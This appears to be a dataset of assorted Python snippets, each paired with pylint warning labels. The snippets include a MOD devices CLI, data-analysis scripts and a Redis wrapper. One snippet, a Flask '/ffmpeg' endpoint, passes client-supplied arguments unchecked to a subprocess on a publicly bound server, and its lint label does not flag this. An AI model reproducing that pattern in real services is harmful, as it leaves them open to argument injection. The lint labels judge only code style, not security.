code
stringlengths 20
13.2k
| label
stringlengths 21
6.26k
|
---|---|
1 import sys
2 print('命令行参数是:')
3 for i in sys.argv:
4 print(i)
5
6 print("python path is in ",sys.path) | Clean Code: No Issues Detected
|
1 def total(a=5,*numbers,**phonebook):
2 print('a',a)
3
4 #通过元组遍历全部的参数
5 for item in numbers:
6 print('num_item',item)
7
8 #通过字典遍历全部的参数
9 for first,second in phonebook.items():
10 print(first,second)
11
12 total(10,1,2,3,Name='zhuly',age=26)
| 1 - warning: keyword-arg-before-vararg
|
1 from mymodule import sayhello,__version__
2
3 sayhello()
4 print('version:',__version__)
| Clean Code: No Issues Detected
|
1 import os
2 import csv
3
4 csvpath = os.path.join('election_data.csv')
5
6 #Variables
7 votes = 0
8 candidate_list = []
9 candidate_count = []
10 candidate_percent = []
11
12 with open("election_data.csv", "r") as in_file:
13 csv_reader = csv.reader(in_file)
14 header = next(csv_reader)
15
16 for row in csv_reader:
17 #Adds total number of votes
18 votes += 1
19 candidate = row[2]
20
21 #If a candidate is in Candidate List, indexes the candidate on Candidate List, finds the index on Candidate Count List, and increases their number of votes by 1
22 if candidate in candidate_list:
23 candidate_index = candidate_list.index(candidate)
24 candidate_count[candidate_index] += 1
25
26 #If a candidate is not in Candidate List, adds candidate to Candidate List, and increases the candidates vote count by 1 on Candidate Count
27 else:
28 candidate_list.append(candidate)
29 candidate_count.append(1)
30
31 #Finds the percent of votes each candidate received, and adds the percentage to the Candidate Percent List
32 for e in range(len(candidate_list)):
33 vote_percent = round((candidate_count[e]/votes) * 100, 2)
34 candidate_percent.append(vote_percent)
35
36 #Finds the Overall Election Winner by finding the candidate listed the maximum amount of times
37 winning_candidate = max(candidate_list, key = candidate_list.count)
38
39 #Print Results to Terminal
40
41 print("_____________________________")
42 print(" Election Results")
43 print("_____________________________")
44 print("Total Votes: " + str(votes))
45 print("_____________________________")
46 for e in range(len(candidate_list)):
47 print(f'{candidate_list[e]} : {candidate_count[e]} votes : {candidate_percent[e]}%')
48 print("_____________________________")
49 print("Winner: " + str(winning_candidate))
50 print("_____________________________")
51
52 #Create and write to Election_Results TXT File
53
54 outpath = os.path.join("Election_Results.txt")
55 txt_file = open("Election_Results.txt", "w")
56
57 txt_file.write("_____________________________\n")
58 txt_file.write(" Election Results\n")
59 txt_file.write("_____________________________\n")
60 txt_file.write("Total Votes: " + str(votes))
61 txt_file.write("\n_____________________________\n")
62 for e in range(len(candidate_list)):
63 txt_file.write(f'{candidate_list[e]} : {candidate_count[e]} votes : {candidate_percent[e]}%\n')
64 txt_file.write("_____________________________\n")
65 txt_file.write("Winner: " + str(winning_candidate))
66 txt_file.write("\n_____________________________")
67
68
69
70
71
72
| 12 - warning: unspecified-encoding
55 - warning: unspecified-encoding
55 - refactor: consider-using-with
|
1 from flask import Flask, request, jsonify
2 from subprocess import Popen, PIPE
3 import uuid
4 import os
5 import json
6
7 app = Flask("ffserver", static_url_path='')
8 processing = False
9
10 @app.route("/")
11 def root():
12 return app.send_static_file("index.html")
13
14 @app.route("/ffmpeg", methods=['POST'])
15 def ffmpeg():
16 global processing
17 if processing == True:
18 return jsonify({ "result": "processing..." })
19 processing = True
20
21 vidID = str(uuid.uuid4())
22 outDir = "static/" + vidID
23 os.makedirs(outDir)
24 cmd = request.json["cmd"].replace("ffmpeg ", "").replace("\"", "")
25 cmdArgs = ["ffmpeg", "-loglevel", "error"]
26 for c in cmd.split(" "):
27 cmdArgs.append(c)
28 proc = Popen(cmdArgs, cwd=outDir, stdout=PIPE, stderr=PIPE)
29 stdout, stderr = proc.communicate()
30
31 result = proc.wait()
32 processing = False
33 if result == 1:
34 os.rmdir(outDir)
35 return jsonify({"error": stderr})
36 return jsonify({ "result": vidID + "/" + cmdArgs[-1] })
37
38 if __name__ == "__main__":
39 app.run(host='0.0.0.0')
| 16 - warning: global-statement
28 - refactor: consider-using-with
29 - warning: unused-variable
5 - warning: unused-import
|
1 import os
2 import pandas as pd
3 import numpy as np
4
5 def load_data_by_fid(fid):
6 '''
7 return a dataframe that has the eid and the 'fid' variable
8 '''
9 df_tab1_i0_comp=pd.read_csv('/temp_project/ukbb/data/i0/ukb22598_i0_comp.csv')
10
11 if int(fid) in df_tab1_i0_comp.fid.values.tolist():
12 fid_num=fid
13
14 var_description = df_tab1_i0_comp[df_tab1_i0_comp['fid']==int(fid_num)].Description.values[0]
15 var_type=df_tab1_i0_comp[df_tab1_i0_comp['fid']==int(fid_num)].Type.values[0]
16
17 var_type_list=['con','cur','dat','int','tex','tim','cas','cam']
18 var_type_list_full=['Continuous','Curve','Date','Integer','Text','Time','Categorical (single)', 'Categorical (multiple)']
19
20 path_p1='/temp_project/ukbb/data/i0/var_'
21
22 if var_type in var_type_list_full:
23 vtyp=var_type_list[var_type_list_full.index(var_type)]
24
25 loadpath=path_p1+str(vtyp)+'/'
26 os.chdir(path_p1+str(vtyp))
27 list_folder=os.listdir()
28
29 pname1=str(vtyp)+str(fid_num)+'i0.csv'
30 pname2='vec_'+str(vtyp)+str(fid_num)+'i0.csv'
31
32 if pname1 in list_folder:
33
34 print('fid ' + str(fid_num) + ' is a single-measure '+str(var_type).lower()+' variable, which is \n'+str(var_description))
35 fpname=list_folder[list_folder.index(pname1)]
36 df_load=pd.read_csv(loadpath+fpname)
37
38 elif pname2 in list_folder:
39
40 print('fid ' + str(fid_num) + ' is a single-measure '+str(var_type).lower()+' variable, which is \n'+str(var_description))
41 fpname=list_folder[list_folder.index(pname2)]
42 df_load=pd.read_csv(loadpath+fpname, sep='\t')
43 return df_load
44
45 else:
46 print('fid not found, please try again')
| 11 - refactor: no-else-return
25 - error: possibly-used-before-assignment
43 - error: possibly-used-before-assignment
5 - refactor: inconsistent-return-statements
3 - warning: unused-import
|
1 import json
2 import os
3
4
5 def read_json_file(path: str):
6 if not os.path.isfile(path):
7 return {}
8 with open(path, 'r') as file:
9 contents = file.read()
10 return json.loads(contents)
| 8 - warning: unspecified-encoding
|
1 import re
2 import sys
3
4 from setuptools import setup
5
6 with open('modcli/__init__.py', 'r') as fh:
7 version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', fh.read(), re.MULTILINE).group(1)
8
9 if sys.version_info[0] < 3:
10 raise Exception("Must be using Python 3")
11
12 setup(
13 name='mod-devel-cli',
14 python_requires='>=3',
15 version=version,
16 description='MOD Command Line Interface',
17 author='Alexandre Cunha',
18 author_email='alex@moddevices.com',
19 license='Proprietary',
20 install_requires=[
21 'click==6.7',
22 'crayons==0.1.2',
23 'requests>=2.18.4',
24 ],
25 packages=[
26 'modcli',
27 ],
28 entry_points={
29 'console_scripts': [
30 'modcli = modcli.cli:main',
31 ]
32 },
33 classifiers=[
34 'Intended Audience :: Developers',
35 'Natural Language :: English',
36 'Operating System :: OS Independent',
37 'Programming Language :: Python',
38 'Programming Language :: Python :: 3',
39 ],
40 url='http://moddevices.com/',
41 )
| 6 - warning: unspecified-encoding
10 - warning: broad-exception-raised
|
1 import os
2
3 CONFIG_DIR = os.path.expanduser('~/.config/modcli')
4 URLS = {
5 'labs': ('https://api-labs.moddevices.com/v2', 'https://pipeline-labs.moddevices.com/bundle/'),
6 'dev': ('https://api-dev.moddevices.com/v2', 'https://pipeline-dev.moddevices.com/bundle/'),
7 }
8 DEFAULT_ENV = 'labs'
| Clean Code: No Issues Detected
|
1 import os
2 import shutil
3 import subprocess
4 import tempfile
5 from hashlib import md5
6
7 import click
8 import crayons
9 import requests
10
11 from modcli import context
12 from modcli.utils import read_json_file
13
14
15 def publish(project_file: str, packages_path: str, keep_environment: bool=False, bundles: list=None,
16 show_result: bool=False, rebuild: bool=False, env_name: str=None, force: bool=False):
17 project_file = os.path.realpath(project_file)
18 packages_path = os.path.realpath(packages_path) if packages_path else None
19
20 env = context.get_env(env_name)
21 if not env.token:
22 raise Exception('You must authenticate first')
23
24 if not os.path.isfile(project_file):
25 raise Exception('File {0} not found or not a valid file'.format(project_file))
26
27 if packages_path:
28 if not os.path.isdir(packages_path):
29 raise Exception('Packages path {0} not found'.format(packages_path))
30 else:
31 packages_path = os.path.dirname(project_file)
32
33 project = os.path.split(project_file)[1]
34 if not force and not click.confirm('Project {0} will be compiled and published in [{1}], '
35 'do you confirm?'.format(crayons.green(project), crayons.green(env.name))):
36 raise Exception('Cancelled')
37
38 process = read_json_file(project_file)
39
40 # setting up process data
41 if keep_environment:
42 process['keep_environment'] = True
43 process['rebuild'] = rebuild
44 buildroot_pkg = process.pop('buildroot_pkg', None)
45 mk_filename = '{0}.mk'.format(buildroot_pkg)
46 if not buildroot_pkg:
47 raise Exception('Missing buildroot_pkg in project file')
48 if bundles:
49 process['bundles'] = [b for b in process['bundles'] if b['name'] in bundles]
50 if not process['bundles']:
51 raise Exception('Could not match any bundle from: {0}'.format(bundles))
52
53 # find buildroot_pkg under packages_path
54 mk_path = next((i[0] for i in os.walk(packages_path) if mk_filename in i[2]), None)
55 if not mk_path:
56 raise Exception('Could not find buildroot mk file for package {0} in {1}'.format(buildroot_pkg, packages_path))
57 basename = os.path.basename(mk_path)
58 if basename != buildroot_pkg:
59 raise Exception('The package folder containing the .mk file has to be named {0}'.format(buildroot_pkg))
60 pkg_path = os.path.dirname(mk_path)
61
62 work_dir = tempfile.mkdtemp()
63 try:
64 package = '{0}.tar.gz'.format(buildroot_pkg)
65 source_path = os.path.join(work_dir, package)
66 try:
67 subprocess.check_output(
68 ['tar', 'zhcf', source_path, buildroot_pkg], stderr=subprocess.STDOUT, cwd=os.path.join(pkg_path)
69 )
70 except subprocess.CalledProcessError as ex:
71 raise Exception(ex.output.decode())
72
73 click.echo('Submitting release process for project {0} using file {1}'.format(project_file, package))
74 click.echo('URL: {0}'.format(env.bundle_url))
75
76 headers = {'Authorization': 'MOD {0}'.format(env.token)}
77
78 result = requests.post('{0}/'.format(env.bundle_url), json=process, headers=headers)
79 if result.status_code == 401:
80 raise Exception('Invalid token - please authenticate (see \'modcli auth\')')
81 elif result.status_code != 200:
82 raise Exception('Error: {0}'.format(result.text))
83 release_process = result.json()
84
85 click.echo('Release process created: {0}'.format(release_process['id']))
86 click.echo('Uploading buildroot package {0} ...'.format(package))
87 with open(source_path, 'rb') as fh:
88 data = fh.read()
89 headers = {'Content-Type': 'application/octet-stream'}
90 result = requests.post(release_process['source-href'], data=data, headers=headers)
91 if result.status_code == 401:
92 raise Exception('Invalid token - please authenticate (see \'modcli auth\')')
93 elif result.status_code != 201:
94 raise Exception('Error: {0}'.format(result.text))
95 checksum = result.text.lstrip('"').rstrip('"')
96
97 result_checksum = md5(data).hexdigest()
98 if checksum == result_checksum:
99 click.echo('Checksum match ok!')
100 else:
101 raise Exception('Checksum mismatch: {0} <> {1}'.format(checksum, result_checksum))
102 finally:
103 click.echo('Cleaning up...')
104 shutil.rmtree(work_dir, ignore_errors=True)
105
106 release_process_url = release_process['href']
107 click.echo(crayons.blue('Process url: {0}?pretty=true'.format(release_process_url)))
108 click.echo(crayons.green('Done'))
109 if show_result:
110 click.echo('Retrieving release process from {0} ...'.format(release_process_url))
111 release_process_full = requests.get('{0}?pretty=true'.format(release_process_url)).text
112 click.echo(crayons.blue('================ Release Process {0} ================'.format(release_process['id'])))
113 click.echo(release_process_full)
114 click.echo(crayons.blue('================ End Release Process ================'))
| 15 - refactor: too-many-arguments
15 - refactor: too-many-positional-arguments
15 - refactor: too-many-locals
22 - warning: broad-exception-raised
25 - warning: broad-exception-raised
29 - warning: broad-exception-raised
36 - warning: broad-exception-raised
47 - warning: broad-exception-raised
51 - warning: broad-exception-raised
56 - warning: broad-exception-raised
59 - warning: broad-exception-raised
71 - warning: raise-missing-from
71 - warning: broad-exception-raised
78 - warning: missing-timeout
79 - refactor: no-else-raise
80 - warning: broad-exception-raised
82 - warning: broad-exception-raised
90 - warning: missing-timeout
91 - refactor: no-else-raise
92 - warning: broad-exception-raised
94 - warning: broad-exception-raised
101 - warning: broad-exception-raised
111 - warning: missing-timeout
15 - refactor: too-many-branches
15 - refactor: too-many-statements
|
1 import click
2 import crayons
3
4 from modcli import context, auth, __version__, bundle
5
6 _sso_disclaimer = '''SSO login requires you have a valid account in MOD Forum (https://forum.moddevices.com).
7 If your browser has an active session the credentials will be used for this login. Confirm?'''
8
9
10 @click.group(context_settings=dict(help_option_names=['-h', '--help']))
11 @click.version_option(prog_name='modcli', version=__version__)
12 def main():
13 pass
14
15
16 @click.group(name='auth', help='Authentication commands')
17 def auth_group():
18 pass
19
20
21 @click.group(name='bundle', help='LV2 bundle commands')
22 def bundle_group():
23 pass
24
25
26 @click.group(name='config', help='Configuration commands')
27 def config_group():
28 pass
29
30
31 @click.command(help='Authenticate user with SSO (MOD Forum)')
32 @click.option('-s', '--show-token', type=bool, help='Print the JWT token obtained', is_flag=True)
33 @click.option('-o', '--one-time', type=bool, help='Only print token once (do not store it)', is_flag=True)
34 @click.option('-y', '--confirm-all', type=bool, help='Confirm all operations', is_flag=True)
35 @click.option('-d', '--detached-mode', type=bool, help='Run process without opening a local browser', is_flag=True)
36 @click.option('-e', '--env_name', type=str, help='Switch to environment before authenticating')
37 def login_sso(show_token: bool, one_time: bool, confirm_all: bool, detached_mode: bool, env_name: str):
38 if env_name:
39 context.set_active_env(env_name)
40 env = context.current_env()
41 if not confirm_all:
42 response = click.confirm(_sso_disclaimer)
43 if not response:
44 exit(1)
45 if not one_time:
46 click.echo('Logging in to [{0}]...'.format(env.name))
47
48 try:
49 if detached_mode:
50 token = auth.login_sso_detached(env.api_url)
51 else:
52 token = auth.login_sso(env.api_url)
53 except Exception as ex:
54 click.echo(crayons.red(str(ex)), err=True)
55 exit(1)
56 return
57
58 if not one_time:
59 env.set_token(token)
60 context.save()
61
62 if show_token or one_time:
63 print(token.strip())
64 else:
65 click.echo(crayons.green('You\'re now logged in as [{0}] in [{1}].'.format(env.username, env.name)))
66
67
68 @click.command(help='Authenticate user')
69 @click.option('-u', '--username', type=str, prompt=True, help='User ID')
70 @click.option('-p', '--password', type=str, prompt=True, hide_input=True, help='User password')
71 @click.option('-s', '--show-token', type=bool, help='Print the JWT token obtained', is_flag=True)
72 @click.option('-o', '--one-time', type=bool, help='Only print token once (do not store it)', is_flag=True)
73 @click.option('-e', '--env_name', type=str, help='Switch to environment before authenticating')
74 def login(username: str, password: str, show_token: bool, one_time: bool, env_name: str):
75 if env_name:
76 context.set_active_env(env_name)
77 env = context.current_env()
78 if not one_time:
79 click.echo('Logging in to [{0}]...'.format(env.name))
80 try:
81 token = auth.login(username, password, env.api_url)
82 except Exception as ex:
83 click.echo(crayons.red(str(ex)), err=True)
84 exit(1)
85 return
86
87 if not one_time:
88 env.set_token(token)
89 context.save()
90
91 if show_token or one_time:
92 print(token.strip())
93 else:
94 click.echo(crayons.green('You\'re now logged in as [{0}] in [{1}].'.format(username, env.name)))
95
96
97 @click.command(help='Remove all tokens and reset context data')
98 def clear_context():
99 try:
100 context.clear()
101 except Exception as ex:
102 click.echo(crayons.red(str(ex)), err=True)
103 exit(1)
104 return
105 click.echo(crayons.green('Context cleared'))
106
107
108 @click.command(help='Show current active access JWT token')
109 @click.option('-e', '--env_name', type=str, help='Show current active token from a specific environment')
110 def active_token(env_name: str):
111 if env_name:
112 context.set_active_env(env_name)
113 token = context.active_token()
114 if not token:
115 click.echo(crayons.red('You must authenticate first.'), err=True)
116 click.echo('Try:\n $ modcli auth login')
117 exit(1)
118 return
119
120 click.echo(token)
121
122
123 @click.command(help='Set active environment, where ENV_NAME is the name')
124 @click.argument('env_name')
125 def set_active_env(env_name: str):
126 try:
127 context.set_active_env(env_name)
128 context.save()
129 except Exception as ex:
130 click.echo(crayons.red(str(ex)), err=True)
131 exit(1)
132 return
133
134 click.echo(crayons.green('Current environment set to: {0}'.format(env_name)))
135
136
137 @click.command(help='Add new environment, where ENV_NAME is the name, API_URL '
138 'and BUNDLE_URL are the API entry points')
139 @click.argument('env_name')
140 @click.argument('api_url')
141 @click.argument('bundle_url')
142 def add_env(env_name: str, api_url: str, bundle_url: str):
143 try:
144 context.add_env(env_name, api_url, bundle_url)
145 context.set_active_env(env_name)
146 context.save()
147 except Exception as ex:
148 click.echo(crayons.red(str(ex)), err=True)
149 exit(1)
150 return
151
152 click.echo(crayons.green('Environment [{0}] added and set as active'.format(env_name)))
153
154
155 @click.command(help='List current configuration', name='list')
156 def list_config():
157 env = context.current_env()
158 click.echo('Active environment: {0}'.format(env.name))
159 click.echo('Authenticated in [{0}]: {1}'.format(env.name, 'Yes' if env.token else 'No'))
160 click.echo('Registered environments: {0}'.format(list(context.environments.keys())))
161
162
163 @click.command(help='Publish LV2 bundles, where PROJECT_FILE points to the buildroot project descriptor file (JSON)')
164 @click.argument('project_file')
165 @click.option('-p', '--packages-path', type=str, help='Path to buildroot package')
166 @click.option('-s', '--show-result', type=bool, help='Print pipeline process result', is_flag=True)
167 @click.option('-k', '--keep-environment', type=bool, help='Don\'t remove build environment after build', is_flag=True)
168 @click.option('-r', '--rebuild', type=bool, help='Don\'t increment release number, just rebuild', is_flag=True)
169 @click.option('-e', '--env', type=str, help='Environment where the bundles will be published')
170 @click.option('-f', '--force', type=bool, help='Don\'t ask for confirmation', is_flag=True)
171 def publish(project_file: str, packages_path: str, show_result: bool, keep_environment: bool,
172 rebuild: bool, env: str, force: bool):
173 try:
174 bundle.publish(project_file, packages_path, show_result=show_result,
175 keep_environment=keep_environment, rebuild=rebuild, env_name=env, force=force)
176 except Exception as ex:
177 click.echo(crayons.red(str(ex)), err=True)
178 exit(1)
179 return
180
181
182 auth_group.add_command(active_token)
183 auth_group.add_command(login)
184 auth_group.add_command(login_sso)
185 bundle_group.add_command(publish)
186 config_group.add_command(add_env)
187 config_group.add_command(set_active_env)
188 config_group.add_command(list_config)
189 config_group.add_command(clear_context)
190 main.add_command(auth_group)
191 main.add_command(bundle_group)
192 main.add_command(config_group)
193
194
195 if __name__ == '__main__':
196 main()
| 10 - refactor: use-dict-literal
44 - refactor: consider-using-sys-exit
53 - warning: broad-exception-caught
56 - warning: unreachable
55 - refactor: consider-using-sys-exit
82 - warning: broad-exception-caught
85 - warning: unreachable
84 - refactor: consider-using-sys-exit
101 - warning: broad-exception-caught
104 - warning: unreachable
103 - refactor: consider-using-sys-exit
118 - warning: unreachable
117 - refactor: consider-using-sys-exit
129 - warning: broad-exception-caught
132 - warning: unreachable
131 - refactor: consider-using-sys-exit
147 - warning: broad-exception-caught
150 - warning: unreachable
149 - refactor: consider-using-sys-exit
171 - refactor: too-many-arguments
171 - refactor: too-many-positional-arguments
176 - warning: broad-exception-caught
179 - warning: unreachable
178 - refactor: consider-using-sys-exit
171 - refactor: useless-return
|
1 from modcli import config
2
3 __version__ = '1.1.3'
4
5 context = config.read_context()
| Clean Code: No Issues Detected
|
1 import socket
2 import webbrowser
3 from http.server import BaseHTTPRequestHandler, HTTPServer
4 from urllib import parse
5
6 import click
7 import requests
8 from click import Abort
9
10 from modcli import __version__
11
12
13 def login(username: str, password: str, api_url: str):
14 result = requests.post('{0}/users/tokens'.format(api_url), json={
15 'user_id': username,
16 'password': password,
17 'agent': 'modcli:{0}'.format(__version__),
18 })
19 if result.status_code != 200:
20 raise Exception('Error: {0}'.format(result.json()['error-message']))
21 return result.json()['message'].strip()
22
23
24 def get_open_port():
25 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
26 s.bind(("", 0))
27 s.listen(1)
28 port = s.getsockname()[1]
29 s.close()
30 return port
31
32
33 def login_sso_detached(api_url: str):
34 click.echo('Running in detached mode...')
35 click.echo('1) Open this url in any browser: {0}'.format('{0}/users/tokens_sso'.format(api_url)))
36 click.echo('2) The URL will automatically redirect to MOD Forum (https://forum.moddevices.com)')
37 click.echo('3) Once MOD Forum page loads, if asked, enter your credentials or register a new user')
38 click.echo('4) A JWT token will be displayed in your browser')
39 try:
40 token = click.prompt('Copy the token value and paste it here, then press ENTER')
41 return token.strip()
42 except Abort:
43 exit(1)
44
45
46 def login_sso(api_url: str):
47 server_host = 'localhost'
48 server_port = get_open_port()
49 local_server = 'http://{0}:{1}'.format(server_host, server_port)
50
51 class SSORequestHandler(BaseHTTPRequestHandler):
52 token = ''
53
54 def do_HEAD(self):
55 self.send_response(200)
56 self.send_header('Content-type', 'text/html')
57 self.end_headers()
58
59 def do_GET(self):
60 response = self.handle_http(200)
61 _, _, _, query, _ = parse.urlsplit(self.path)
62 result = parse.parse_qs(query)
63 tokens = result.get('token', None)
64 SSORequestHandler.token = tokens[0] if len(tokens) > 0 else None
65 self.wfile.write(response)
66
67 def handle_http(self, status_code):
68 self.send_response(status_code)
69 self.send_header('Content-type', 'text/html')
70 self.end_headers()
71 content = '''
72 <html><head><title>modcli - success</title></head>
73 <body>Authentication successful! This browser window can be closed.</body></html>
74 '''
75 return bytes(content, 'UTF-8')
76
77 def log_message(self, format, *args):
78 pass
79
80 httpd = HTTPServer((server_host, server_port), SSORequestHandler)
81 httpd.timeout = 30
82
83 webbrowser.open('{0}/users/tokens_sso?local_url={1}'.format(api_url, local_server))
84
85 try:
86 httpd.handle_request()
87 except KeyboardInterrupt:
88 pass
89
90 token = SSORequestHandler.token
91 if not token:
92 raise Exception('Authentication failed!')
93 return token
| 14 - warning: missing-timeout
20 - warning: broad-exception-raised
43 - refactor: consider-using-sys-exit
33 - refactor: inconsistent-return-statements
77 - warning: redefined-builtin
92 - warning: broad-exception-raised
|
1 import base64
2 import json
3 import os
4 import stat
5
6 import re
7
8 from modcli import settings
9 from modcli.utils import read_json_file
10
11
12 def read_context():
13 context = CliContext.read(settings.CONFIG_DIR)
14 if len(context.environments) == 0:
15 for env_name, urls in settings.URLS.items():
16 context.add_env(env_name, urls[0], urls[1])
17 context.set_active_env(settings.DEFAULT_ENV)
18 context.save()
19 return context
20
21
22 def clear_context():
23 CliContext.clear(settings.CONFIG_DIR)
24
25
26 def _write_file(path: str, data: str, remove_existing: bool=True):
27 # create dir if doesn't exist
28 dirname = os.path.dirname(path)
29 if not os.path.isdir(dirname):
30 os.makedirs(dirname, exist_ok=True)
31 # remove previous file
32 if remove_existing:
33 if os.path.isfile(path):
34 os.remove(path)
35 # write json file
36 with os.fdopen(os.open(path, os.O_WRONLY | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR), 'w') as fh:
37 fh.write(data)
38 fh.writelines(os.linesep)
39
40
41 def _write_json_file(path: str, data: dict, remove_existing: bool=True):
42 _write_file(path, json.dumps(data, indent=4), remove_existing)
43
44
45 def _remove_file(path: str):
46 if os.path.isfile(path):
47 os.remove(path)
48
49
50 class CliContext(object):
51 _filename = 'context.json'
52 _access_token_filename = 'access_token'
53
54 @staticmethod
55 def read(path: str):
56 context = CliContext(path)
57 data = read_json_file(os.path.join(path, CliContext._filename))
58 if not data:
59 return context
60 for env_data in data['environments']:
61 context.add_env(env_data['name'], env_data['api_url'], env_data['bundle_url'])
62 env = context.environments[env_data['name']]
63 env.username = env_data['username']
64 env.token = env_data['token']
65 env.exp = env_data['exp']
66 context.set_active_env(data['active_env'])
67 return context
68
69 def __init__(self, path: str):
70 self._path = path
71 self._active_env = ''
72 self.environments = {}
73
74 def _ensure_env(self, env_name: str):
75 if env_name not in self.environments:
76 raise Exception('Environment {0} doen\'t exist'.format(env_name))
77
78 def set_active_env(self, env_name: str):
79 if not env_name:
80 self._active_env = ''
81 else:
82 self._ensure_env(env_name)
83 self._active_env = env_name
84
85 def add_env(self, env_name: str, api_url: str, bundle_url: str):
86 if not env_name:
87 raise Exception('Environment name is invalid')
88 if env_name in self.environments:
89 raise Exception('Environment {0} already exists'.format(env_name))
90 if not re.match('https?://.*', api_url):
91 raise Exception('Invalid api_url: {0}'.format(api_url))
92 if not re.match('https?://.*', bundle_url):
93 raise Exception('Invalid api_url: {0}'.format(bundle_url))
94
95 self.environments[env_name] = EnvSettings(env_name, api_url, bundle_url)
96
97 def remove_env(self, env_name: str):
98 self._ensure_env(env_name)
99 del self.environments[env_name]
100
101 def active_token(self):
102 return self.current_env().token
103
104 def current_env(self):
105 if not self._active_env:
106 raise Exception('Not environment has been set')
107 return self.environments[self._active_env]
108
109 def get_env(self, env_name: str=None):
110 if not env_name:
111 return self.current_env()
112 self._ensure_env(env_name)
113 return self.environments[env_name]
114
115 def save(self):
116 data = {
117 'active_env': self._active_env,
118 'environments': list({
119 'name': e.name,
120 'api_url': e.api_url,
121 'bundle_url': e.bundle_url,
122 'username': e.username,
123 'token': e.token,
124 'exp': e.exp,
125 } for e in self.environments.values())
126 }
127 _write_json_file(os.path.join(self._path, CliContext._filename), data)
128 active_token = self.active_token()
129 if active_token:
130 _write_file(os.path.join(self._path, CliContext._access_token_filename), active_token)
131 else:
132 _remove_file(os.path.join(self._path, CliContext._access_token_filename))
133
134 def clear(self):
135 _remove_file(os.path.join(self._path, CliContext._filename))
136 _remove_file(os.path.join(self._path, CliContext._access_token_filename))
137 self.environments.clear()
138
139
140 class EnvSettings(object):
141
142 def __init__(self, name: str, api_url: str, bundle_url: str):
143 self.name = name
144 self.api_url = api_url.rstrip('/')
145 self.bundle_url = bundle_url.rstrip('/')
146 self.username = ''
147 self.token = ''
148 self.exp = ''
149
150 def set_token(self, token: str):
151 _, payload, _ = token.split('.')
152 payload_data = json.loads(base64.b64decode(payload + '===').decode())
153 username = payload_data['user_id']
154 exp = payload_data.get('exp', None)
155
156 self.username = username
157 self.token = token
158 self.exp = exp
| 50 - refactor: useless-object-inheritance
76 - warning: broad-exception-raised
87 - warning: broad-exception-raised
89 - warning: broad-exception-raised
91 - warning: broad-exception-raised
93 - warning: broad-exception-raised
106 - warning: broad-exception-raised
140 - refactor: useless-object-inheritance
140 - refactor: too-few-public-methods
|
1 # -*- coding:utf-8 -*-
2
3 from redis import Redis
4
5 # Redis列表的边界下标
6 LEFTMOST = 0
7 RIGHTMOST = -1
8
9
10 class RedisListSecondPack:
11
12 def __init__(self, name, client=Redis()):
13 self.name = name
14 self.client = client
15
16 def left_append(self, content):
17 # 从列表最左边追加value
18 return self.client.lpush(self.name, content)
19
20 def right_append(self, content):
21 # 从列表最右边追加value
22 return self.client.rpush(self.name, content)
23
24 def read(self, start=LEFTMOST, stop=RIGHTMOST):
25 # 获取裂变[start: stop]之间数据,默认状态下获取所有
26 return self.client.lrange(self.name, start, stop)
27
28 def length(self):
29 # 获取列表长度
30 return self.client.llen(self.name)
31
32 def clear(self):
33 # 因为del是Python的保留字
34 # 所以redis-py用delete代替del命令
35 self.client.delete(self.name)
36
37 def keep(self, size):
38 # 只保留列表范围内的条目
39 self.client.ltrim(self.name, LEFTMOST, size-1)
40
41
42 if __name__ == '__main__':
43 import json
44 client = Redis(host='localhost', port=6379, db=0)
45 list_operate_client = RedisListSecondPack('SHOWPAYBIZ000001', client)
46 for x in range(4):
47 list_operate_client.left_append(json.dumps({'a': 'my %s data' % str(x)}))
48 print list_operate_client.read(), list_operate_client.length()
49 list_operate_client.keep(3)
50 print list_operate_client.read(), list_operate_client.length()
51 list_operate_client.clear()
52
53
54
55
| 48 - error: syntax-error
|
1 import plotly.figure_factory as ff
2 import pandas as pd
3 import csv
4 import statistics
5 import random
6 import plotly.graph_objects as go
7
8 df = pd.read_csv("StudentsPerformance.csv")
9 data = df["mathscore"].tolist()
10 """ fig = ff.create_distplot([data], ["Math Scores"], show_hist=False)
11 fig.show() """
12
13 P_mean = statistics.mean(data)
14 P_stdev = statistics.stdev(data)
15
16 print("Mean of the Population: ", P_mean)
17 print("Standard Deviation of the Population: ", P_stdev)
18
19 def randomSetOfMeans(counter):
20 dataSet = []
21 for i in range (0, counter):
22 randomIndex = random.randint(0, len(data) - 1)
23 value = data[randomIndex]
24 dataSet.append(value)
25
26 mean = statistics.mean(dataSet)
27 return(mean)
28
29 meanList = []
30 for i in range (0,100):
31 setOfMeans = randomSetOfMeans(30)
32 meanList.append(setOfMeans)
33
34 S_mean = statistics.mean(meanList)
35 S_stdev = statistics.stdev(meanList)
36
37 print("Mean of the Sample: ", S_mean)
38 print("Standard Deviation of the Sample: ", S_stdev)
39
40 first_stdev_start, first_stdev_end = P_mean - P_stdev, P_mean + P_stdev
41 second_stdev_start, second_stdev_end = P_mean - (2*P_stdev), P_mean + (2*P_stdev)
42 third_stdev_start, third_stdev_end = P_mean - (3*P_stdev), P_mean + (3*P_stdev)
43
44 fig = ff.create_distplot([meanList], ["Math Scores"], show_hist=False)
45 fig.add_trace(go.Scatter(x=[P_mean, P_mean], y=[0, 0.17], mode="lines", name="MEAN"))
46 fig.add_trace(go.Scatter(x=[first_stdev_start, first_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1"))
47 fig.add_trace(go.Scatter(x=[first_stdev_end, first_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 1"))
48 fig.add_trace(go.Scatter(x=[second_stdev_start, second_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2"))
49 fig.add_trace(go.Scatter(x=[second_stdev_end, second_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 2"))
50 fig.add_trace(go.Scatter(x=[third_stdev_start, third_stdev_start], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3"))
51 fig.add_trace(go.Scatter(x=[third_stdev_end, third_stdev_end], y=[0, 0.17], mode="lines", name="STANDARD DEVIATION 3"))
52
53 #First Intervention Data Analyzation
54
55 df_1 = pd.read_csv("Inter1.csv")
56 data_1 = df_1["mathscore"].tolist()
57 meanOfSample1 = statistics.mean(data_1)
58 print("Mean of Sample 1: ", meanOfSample1)
59 fig.add_trace(go.Scatter(x=[meanOfSample1, meanOfSample1], y=[0, 0.17], mode="lines", name="Mean of Sample 1"))
60
61 #Third Intervention Data Analyzation
62
63 df_3 = pd.read_csv("Inter3.csv")
